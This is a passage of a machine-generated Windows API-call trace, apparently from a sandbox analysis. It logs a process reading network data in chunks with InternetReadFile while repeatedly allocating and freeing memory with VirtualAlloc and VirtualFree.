dwSize=0x58000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b78000 [0124.846] VirtualFree (lpAddress=0x4b20000, dwSize=0x54000, dwFreeType=0x4000) returned 1 [0124.851] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.851] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x4c20000 [0124.852] VirtualAlloc (lpAddress=0x4c20000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x4c20000 [0124.852] VirtualAlloc (lpAddress=0x4bd0000, dwSize=0x50000, flAllocationType=0x1000, flProtect=0x4) returned 0x4bd0000 [0124.858] VirtualFree (lpAddress=0x4b74000, dwSize=0x58000, dwFreeType=0x4000) returned 1 [0124.861] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.861] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x58000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0124.868] VirtualFree (lpAddress=0x4c20000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0124.875] VirtualFree (lpAddress=0x4bcc000, dwSize=0x54000, dwFreeType=0x4000) returned 1 [0124.880] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.880] VirtualFree (lpAddress=0x4c24000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0124.881] VirtualFree (lpAddress=0x4c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0124.881] VirtualAlloc (lpAddress=0x4b78000, dwSize=0x58000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b78000 [0124.888] VirtualFree (lpAddress=0x4b20000, dwSize=0x54000, dwFreeType=0x4000) returned 1 [0124.893] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.894] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x4c20000 [0124.894] VirtualAlloc (lpAddress=0x4c20000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x4c20000 [0124.894] VirtualAlloc (lpAddress=0x4bd0000, dwSize=0x50000, flAllocationType=0x1000, flProtect=0x4) returned 0x4bd0000 [0124.900] VirtualFree (lpAddress=0x4b74000, dwSize=0x58000, dwFreeType=0x4000) returned 1 [0124.903] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.903] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x58000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0124.908] VirtualFree (lpAddress=0x4c20000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0124.916] VirtualFree (lpAddress=0x4bcc000, dwSize=0x54000, dwFreeType=0x4000) returned 1 [0124.922] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.922] VirtualAlloc (lpAddress=0x4b78000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b78000 [0124.923] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.923] VirtualFree (lpAddress=0x4c24000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0124.923] VirtualFree (lpAddress=0x4c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0124.924] VirtualAlloc (lpAddress=0x4b7c000, dwSize=0x5c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b7c000 [0124.931] VirtualFree (lpAddress=0x4b20000, dwSize=0x58000, dwFreeType=0x4000) returned 1 [0125.020] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0125.020] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x4c20000 [0125.021] VirtualAlloc (lpAddress=0x4c20000, dwSize=0x14000, flAllocationType=0x1000, flProtect=0x4) returned 0x4c20000 [0125.021] VirtualAlloc (lpAddress=0x4bd8000, dwSize=0x48000, flAllocationType=0x1000, flProtect=0x4) returned 0x4bd8000 [0125.022] VirtualFree (lpAddress=0x4bd4000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.030] VirtualFree (lpAddress=0x4b78000, dwSize=0x58000, dwFreeType=0x4000) returned 1 [0125.033] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0125.033] VirtualFree (lpAddress=0x4bd0000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.033] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x5c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0125.038] VirtualFree (lpAddress=0x4c20000, dwSize=0x10000, dwFreeType=0x4000) returned 1 [0125.046] VirtualFree (lpAddress=0x4bd8000, dwSize=0x48000, dwFreeType=0x4000) returned 1 [0125.047] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0125.048] VirtualFree (lpAddress=0x4c30000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.048] VirtualFree (lpAddress=0x4c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0125.049] VirtualAlloc (lpAddress=0x4b7c000, dwSize=0x5c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b7c000 [0125.056] VirtualFree (lpAddress=0x4b20000, dwSize=0x58000, dwFreeType=0x4000) returned 1 [0125.061] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0125.061] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x4c20000 [0125.061] VirtualAlloc (lpAddress=0x4c20000, dwSize=0x14000, flAllocationType=0x1000, flProtect=0x4) returned 0x4c20000 [0125.062] VirtualAlloc (lpAddress=0x4bd8000, dwSize=0x48000, flAllocationType=0x1000, flProtect=0x4) returned 0x4bd8000 [0125.063] VirtualFree (lpAddress=0x4bd4000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.082] VirtualFree (lpAddress=0x4b78000, dwSize=0x58000, dwFreeType=0x4000) returned 1 [0125.085] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0125.085] VirtualFree (lpAddress=0x4bd0000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.086] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x5c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0125.095] VirtualFree (lpAddress=0x4c20000, dwSize=0x10000, dwFreeType=0x4000) returned 1 [0125.103] VirtualFree (lpAddress=0x4bd8000, dwSize=0x48000, dwFreeType=0x4000) returned 1 [0125.107] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0125.107] VirtualFree (lpAddress=0x4c30000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.108] VirtualFree (lpAddress=0x4c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0125.108] VirtualAlloc (lpAddress=0x4b7c000, dwSize=0x5c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b7c000 [0125.119] VirtualFree (lpAddress=0x4b20000, dwSize=0x58000, dwFreeType=0x4000) returned 1 [0125.126] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0125.126] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x4c20000 [0125.126] VirtualAlloc (lpAddress=0x4c20000, dwSize=0x14000, flAllocationType=0x1000, flProtect=0x4) returned 0x4c20000 [0125.127] VirtualAlloc (lpAddress=0x4bd8000, dwSize=0x48000, flAllocationType=0x1000, flProtect=0x4) returned 0x4bd8000 [0125.128] VirtualFree (lpAddress=0x4bd4000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.136] VirtualFree (lpAddress=0x4b78000, dwSize=0x58000, dwFreeType=0x4000) returned 1 [0125.139] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0125.139] VirtualFree (lpAddress=0x4bd0000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.140] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x5c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0125.148] VirtualFree (lpAddress=0x4c20000, dwSize=0x10000, dwFreeType=0x4000) returned 1 [0125.156] VirtualFree (lpAddress=0x4bd8000, dwSize=0x48000, dwFreeType=0x4000) returned 1 [0125.160] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0125.160] VirtualFree (lpAddress=0x4c30000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.161] VirtualFree (lpAddress=0x4c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0125.161] VirtualAlloc (lpAddress=0x4b7c000, dwSize=0x5c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b7c000 [0125.171] VirtualFree (lpAddress=0x4b20000, dwSize=0x58000, dwFreeType=0x4000) returned 1 [0125.176] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0125.176] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x4c20000 [0125.177] VirtualAlloc (lpAddress=0x4c20000, dwSize=0x14000, flAllocationType=0x1000, flProtect=0x4) returned 0x4c20000 [0125.177] VirtualAlloc (lpAddress=0x4bd8000, dwSize=0x48000, flAllocationType=0x1000, flProtect=0x4) returned 0x4bd8000 [0125.185] VirtualFree (lpAddress=0x4b78000, dwSize=0x5c000, dwFreeType=0x4000) returned 1 [0125.187] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0125.188] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x5c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0125.194] VirtualFree (lpAddress=0x4c20000, dwSize=0x10000, dwFreeType=0x4000) returned 1 [0125.203] VirtualFree (lpAddress=0x4bd4000, dwSize=0x4c000, dwFreeType=0x4000) returned 1 [0125.207] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0125.208] VirtualFree (lpAddress=0x4c30000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.208] VirtualFree (lpAddress=0x4c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0125.209] VirtualAlloc (lpAddress=0x4b7c000, dwSize=0x5c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b7c000 [0125.215] VirtualFree (lpAddress=0x4b20000, dwSize=0x58000, dwFreeType=0x4000) returned 1 [0125.220] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0125.220] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x4c20000 [0125.221] VirtualAlloc (lpAddress=0x4c20000, dwSize=0x14000, flAllocationType=0x1000, flProtect=0x4) returned 0x4c20000 [0125.221] VirtualAlloc (lpAddress=0x4bd8000, dwSize=0x48000, flAllocationType=0x1000, flProtect=0x4) returned 0x4bd8000 [0125.233] VirtualFree (lpAddress=0x4b78000, dwSize=0x5c000, dwFreeType=0x4000) returned 1 [0125.236] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0125.237] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x5c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0125.246] VirtualFree (lpAddress=0x4c20000, dwSize=0x10000, dwFreeType=0x4000) returned 1 [0125.253] VirtualFree (lpAddress=0x4bd4000, dwSize=0x4c000, dwFreeType=0x4000) returned 1 [0125.259] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x200) returned 1 [0125.260] VirtualFree (lpAddress=0x4c30000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.260] VirtualFree (lpAddress=0x4c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0125.261] VirtualAlloc (lpAddress=0x4b7c000, dwSize=0x5c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b7c000 [0125.270] VirtualFree (lpAddress=0x4b20000, dwSize=0x58000, dwFreeType=0x4000) returned 1 [0125.275] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x0) returned 1 [0125.367] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0125.369] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0125.370] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x4c20000 [0125.370] VirtualAlloc (lpAddress=0x4c20000, dwSize=0x14000, flAllocationType=0x1000, flProtect=0x4) returned 0x4c20000 [0125.371] VirtualAlloc (lpAddress=0x4bd8000, dwSize=0x48000, flAllocationType=0x1000, flProtect=0x4) returned 0x4bd8000 [0125.380] VirtualFree (lpAddress=0x4c20000, dwSize=0x14000, dwFreeType=0x4000) returned 1 [0125.387] VirtualFree (lpAddress=0x4bd8000, dwSize=0x48000, dwFreeType=0x4000) returned 1 [0125.392] VirtualFree (lpAddress=0x4c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0125.393] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x4c20000 [0125.393] VirtualAlloc (lpAddress=0x4c20000, dwSize=0x14000, flAllocationType=0x1000, flProtect=0x4) returned 0x4c20000 [0125.394] VirtualAlloc (lpAddress=0x4bd8000, dwSize=0x48000, flAllocationType=0x1000, flProtect=0x4) returned 0x4bd8000 [0125.400] VirtualFree (lpAddress=0x4c20000, dwSize=0x14000, dwFreeType=0x4000) returned 1 [0125.409] VirtualFree (lpAddress=0x4bd8000, dwSize=0x48000, dwFreeType=0x4000) returned 1 [0125.415] VirtualFree (lpAddress=0x4c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0125.419] VirtualAlloc (lpAddress=0x4748000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x4748000 [0125.420] VirtualFree (lpAddress=0x4748000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.422] VirtualAlloc (lpAddress=0x4748000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x4748000 [0125.427] VirtualFree (lpAddress=0x4748000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.428] VirtualAlloc (lpAddress=0x4748000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x4748000 [0125.430] VirtualAlloc (lpAddress=0x4bd8000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x4bd8000 [0125.431] VirtualFree (lpAddress=0x4748000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.432] VirtualAlloc (lpAddress=0x4748000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x4748000 [0125.433] VirtualFree (lpAddress=0x4bd8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.434] VirtualFree (lpAddress=0x4bdc000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.435] VirtualAlloc (lpAddress=0x4bd8000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x4bd8000 [0125.436] VirtualFree (lpAddress=0x4748000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.437] VirtualFree (lpAddress=0x474c000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.438] VirtualAlloc (lpAddress=0x4748000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x4748000 [0125.439] VirtualFree (lpAddress=0x4bd8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.440] VirtualFree (lpAddress=0x4bdc000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.441] VirtualFree (lpAddress=0x474c000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.442] VirtualAlloc (lpAddress=0x4bd8000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x4bd8000 [0125.442] VirtualFree (lpAddress=0x4748000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.443] VirtualAlloc (lpAddress=0x4748000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x4748000 [0125.443] VirtualFree (lpAddress=0x4bd8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.444] VirtualFree (lpAddress=0x4bdc000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.445] VirtualFree (lpAddress=0x474c000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.445] VirtualAlloc (lpAddress=0x4bd8000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x4bd8000 [0125.446] VirtualFree (lpAddress=0x4748000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.446] VirtualAlloc (lpAddress=0x4748000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x4748000 [0125.447] VirtualFree (lpAddress=0x4bd8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.448] VirtualFree (lpAddress=0x4bdc000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.449] VirtualFree (lpAddress=0x474c000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.450] VirtualAlloc (lpAddress=0x4bd8000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x4bd8000 [0125.450] VirtualFree (lpAddress=0x4748000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.451] VirtualAlloc (lpAddress=0x4748000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x4748000 [0125.451] VirtualFree (lpAddress=0x4bd8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.452] VirtualFree (lpAddress=0x4bdc000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.453] VirtualFree (lpAddress=0x474c000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.454] VirtualAlloc (lpAddress=0x4bd8000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x4bd8000 [0125.455] VirtualFree (lpAddress=0x4748000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.456] VirtualAlloc (lpAddress=0x4748000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x4748000 [0125.456] VirtualFree (lpAddress=0x4bd8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.458] VirtualFree (lpAddress=0x4bdc000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.458] VirtualFree (lpAddress=0x474c000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.459] VirtualAlloc (lpAddress=0x4bd8000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x4bd8000 [0125.460] VirtualFree (lpAddress=0x4748000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.461] VirtualAlloc (lpAddress=0x4748000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x4748000 [0125.461] VirtualFree (lpAddress=0x4bd8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.462] VirtualFree (lpAddress=0x4bdc000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.463] VirtualFree (lpAddress=0x474c000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.464] VirtualAlloc (lpAddress=0x4bd8000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x4bd8000 [0125.466] VirtualFree (lpAddress=0x4748000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.466] VirtualAlloc (lpAddress=0x4748000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x4748000 [0125.467] VirtualFree (lpAddress=0x4bd8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.468] VirtualFree (lpAddress=0x474c000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.469] VirtualFree (lpAddress=0x4bdc000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.469] VirtualAlloc (lpAddress=0x4bd8000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x4bd8000 [0125.470] VirtualFree (lpAddress=0x4748000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.471] VirtualAlloc (lpAddress=0x4748000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x4748000 [0125.471] VirtualFree (lpAddress=0x4bd8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.472] VirtualFree (lpAddress=0x4bdc000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.473] VirtualFree (lpAddress=0x474c000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.474] VirtualAlloc (lpAddress=0x4bd8000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x4bd8000 [0125.475] VirtualAlloc (lpAddress=0x4be0000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x4be0000 [0125.476] VirtualFree (lpAddress=0x4bd8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.477] VirtualFree (lpAddress=0x4748000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.478] VirtualFree (lpAddress=0x4be4000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.479] VirtualAlloc (lpAddress=0x4be4000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x4be4000 [0125.480] VirtualFree (lpAddress=0x4be4000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.481] VirtualFree (lpAddress=0x4be8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.481] VirtualAlloc (lpAddress=0x4be4000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x4be4000 [0125.482] VirtualFree (lpAddress=0x4bdc000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.482] VirtualAlloc (lpAddress=0x4bd8000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x4bd8000 [0125.483] VirtualFree (lpAddress=0x4be8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.484] VirtualFree (lpAddress=0x4be4000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.485] VirtualFree (lpAddress=0x4be0000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.485] VirtualAlloc (lpAddress=0x4be0000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x4be0000 [0125.487] VirtualFree (lpAddress=0x4bd8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.488] VirtualAlloc (lpAddress=0x4be8000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x4be8000 [0125.497] VirtualFree (lpAddress=0x4be4000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.498] VirtualFree (lpAddress=0x4bdc000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.499] VirtualFree (lpAddress=0x4be0000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.500] VirtualAlloc (lpAddress=0x4bd8000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x4bd8000 [0125.500] VirtualFree (lpAddress=0x4be8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.501] VirtualFree (lpAddress=0x4bec000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.502] VirtualAlloc (lpAddress=0x4be0000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x4be0000 [0125.503] VirtualFree (lpAddress=0x4bd8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.504] VirtualAlloc (lpAddress=0x4be8000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x4be8000 [0125.505] VirtualFree (lpAddress=0x4bdc000, dwSize=0x8000, dwFreeType=0x4000) returned 1 [0125.505] VirtualAlloc (lpAddress=0x4bd8000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x4bd8000 [0125.506] VirtualFree (lpAddress=0x4be4000, dwSize=0x8000, dwFreeType=0x4000) returned 1 [0125.507] VirtualFree (lpAddress=0x4bec000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.508] VirtualAlloc (lpAddress=0x4be0000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x4be0000 [0125.509] VirtualFree (lpAddress=0x4bd8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.510] VirtualAlloc (lpAddress=0x4be8000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x4be8000 [0125.511] VirtualFree (lpAddress=0x4be0000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.512] VirtualFree (lpAddress=0x4bdc000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.512] VirtualFree (lpAddress=0x4bec000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.513] VirtualAlloc (lpAddress=0x4bec000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x4bec000 [0125.514] VirtualFree (lpAddress=0x4be4000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.514] VirtualAlloc (lpAddress=0x4bd8000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x4bd8000 [0125.515] VirtualFree (lpAddress=0x4be8000, dwSize=0x8000, dwFreeType=0x4000) returned 1 [0125.516] VirtualFree (lpAddress=0x4bf0000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.519] VirtualAlloc (lpAddress=0x4be0000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x4be0000 [0125.520] VirtualFree (lpAddress=0x4bd8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.521] VirtualAlloc (lpAddress=0x4be8000, 